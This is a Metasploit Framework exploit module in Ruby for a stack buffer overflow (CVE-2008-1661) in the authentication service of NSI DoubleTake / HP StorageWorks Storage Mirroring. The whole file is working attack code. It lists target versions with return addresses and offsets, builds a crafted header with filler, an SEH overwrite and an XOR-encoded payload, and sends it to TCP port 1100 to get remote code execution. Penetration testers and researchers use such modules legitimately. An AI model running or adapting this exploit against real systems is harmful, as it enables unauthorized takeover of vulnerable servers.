### $Id: doubletake.rb 9669 2010-07-03 03:13:45Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow','Description'=> %q{
This module exploits a stack buffer overflow in the authentication mechanism of
NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability
was found by Titon of Bastard Labs.},'Author' => ['ri0t <ri0t[at]ri0tnet.net>'],'Version'=> '$Revision: 9669 $','References' =>
[['CVE','2008-1661'],['OSVDB','45924'],],'Privileged' => false,'DefaultOptions' =>
{'EXITFUNC' => 'process',},'Payload'=>
{'Space'=> 500,'BadChars' => "\x00",},'Platform' => 'win','Targets'=>
[['doubletake 4.5.0',{'Ret' => 0x006f5fa7,'Offset' => 5544 }],['doubletake 4.4.2',{'Ret' => 0x0074e307,'Offset' => 944}],['doubletake 4.5.0.1819',{'Ret' => 0x006e62dd,'Offset' => 5544 }],],'DefaultTarget'=> 0,'DisclosureDate' => 'Jun 04 2008'))
register_options([
Opt::RPORT(1100)], self.class)end
def exploit
connect
print_status("Trying target #{target.name}...")
header =
"\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+"\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"
xor = Rex::Encoding::Xor::Byte
filler =rand_text_english(1)*(target['Offset'])
seh = generate_seh_payload(target.ret)
buffercoded = xor.encode(seh+payload.encoded,[0xf0].pack("C"))
sploit =header + filler + buffercoded[0]
sock.put(sploit)
handler
disconnect
endend
